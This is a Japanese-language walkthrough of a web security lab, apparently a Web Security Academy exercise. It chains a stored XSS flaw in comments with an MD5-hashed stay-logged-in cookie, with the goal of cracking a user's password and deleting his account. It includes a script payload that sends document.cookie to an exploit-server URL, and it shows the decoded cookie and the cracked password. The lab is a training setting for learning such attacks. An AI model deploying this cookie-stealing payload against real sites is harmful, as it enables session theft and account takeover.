Hello there, ('ω')ノ
オフラインパスワードクラッキングを。
このラボでは、ユーザのパスワードハッシュをCookieに保存して。
ラボには、コメント機能にXSSの脆弱性も含まれていて。
Carlosの stay-logged-inクッキとそれを使用して彼のパスワードを解読して。
carlosのアカウントを削除せよと。
まずは、ログインして。

リクエストを確認して。

Cookieのstay-logged-inをBase64でデコードすると。
username+':'+md5HashOfPasswordが確認できて。
51dc30ddc473d43a6011e9ebba6ca770

下記のサイトで、ハッシュをクラックしてみると。
パスワードが確認できて。
注意事項として顧客サイトをテストする際には、Webサイト上のサービスではなく。
セキュリティ上、hashcatなどのツールを使用する必要があって。

次にコメントにXSSのエクスプロイトを投稿して。
<img src=x onerror=alert(1) ?>

XSSの脆弱性が確認できて。

エクスプロイトサーバのURLをコピーしておいて。

再度、下記のペイロードを投稿して。
<script>document.location='https://ac3e1fa31e7143cd80f72330012d00f7.web-security-academy.net/'+document.cookie

アクセスログでで、stay-logged-inを確認して。
stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz

さきほどと同様にデコードして。

ハッシュをクラックすると、パスワードがわかったので。
onceuponatime

carlosでログインして。

Deleteして。

再度、パスワードを入力してDeleteすると。

クリアできた。

Best regards, (^^ゞ